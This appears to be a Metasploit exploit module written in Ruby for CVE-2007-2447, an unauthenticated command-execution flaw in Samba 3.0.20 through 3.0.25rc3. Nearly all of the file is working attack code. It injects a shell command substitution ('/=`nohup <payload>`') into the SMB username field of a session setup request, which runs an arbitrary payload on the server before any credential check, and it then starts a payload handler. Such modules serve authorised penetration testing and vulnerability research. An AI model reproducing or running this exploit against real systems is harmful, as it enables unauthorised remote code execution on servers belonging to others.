##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SMB::Client

  # Shorthands kept for the customised session_setup_no_ntlmssp path.
  CONST = Rex::Proto::SMB::Constants
  CRYPT = Rex::Proto::SMB::Crypt

  # Module metadata: one "Automatic" target, cmd-style payloads only, SMB on
  # port 139 by default, and the SMB protocol version option dropped because
  # exploit() always forces SMB1.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Samba "username map script" Command Execution',
        'Description' => %q{
          This module exploits a command execution vulnerability in Samba
          versions 3.0.20 through 3.0.25rc3 when using the non-default
          "username map script" configuration option. By specifying a username
          containing shell meta characters, attackers can execute arbitrary
          commands.

          No authentication is needed to exploit this vulnerability since
          this option is used to map usernames prior to authentication!
        },
        'Author' => %w[jduck],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2007-2447'],
          ['OSVDB', '34700'],
          ['BID', '23972'],
          ['URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534'],
          ['URL', 'http://samba.org/samba/security/CVE-2007-2447.html']
        ],
        'Platform' => %w[unix],
        'Arch' => ARCH_CMD,
        # The mapped command runs under whatever account smbd uses for the
        # script (root or nobody, per the original author's note).
        'Privileged' => true,
        'Payload' => {
          'Space' => 1024,
          'DisableNops' => true,
          'Compat' => {
            'PayloadType' => 'cmd'
            # *_perl / *_ruby variants only work when the interpreter is
            # present on the target; results vary between systems.
          }
        },
        'Targets' => [
          ['Automatic', {}]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2007-05-14'
      )
    )

    register_options(
      [
        Opt::RPORT(139)
      ]
    )

    deregister_options('SMB::ProtocolVersion')
  end

  # Connects with the Rex SMB1 client, sends the poisoned user name in a
  # single session setup, then hands off to the payload handler.
  def exploit
    vprint_status('Use Rex client (SMB1 only) since this module is not compatible with RubySMB client')
    connect(versions: [1])

    # The "user name" is a shell command substitution: Samba passes the name
    # to "username map script" through a shell, so `nohup <payload>` executes
    # on the server before any credential check (see Description).
    # NOTE(review): a payload containing a literal backtick would terminate
    # the substitution early and no BadChars are declared for it — confirm
    # before relying on arbitrary cmd payloads (e.g. cmd/unix/generic).
    crafted_user = "/=`nohup #{payload.encoded}`"
    poke_username_map(crafted_user)

    handler
  end

  private

  # Negotiates and issues one non-NTLMSSP session setup carrying +user+ as
  # the account name, a random 16-byte password and the configured SMBDomain.
  # Timeouts and login failures are swallowed deliberately: by the time Samba
  # answers (or fails to), the injected command has either run or it has not,
  # and nothing here can tell the two apart.
  def poke_username_map(user)
    simple.client.negotiate(false)
    simple.client.session_setup_no_ntlmssp(user, rand_text(16), datastore['SMBDomain'], false)
  rescue ::Timeout::Error, XCEPT::LoginError
    # expected outcome either way; see method comment
  end
end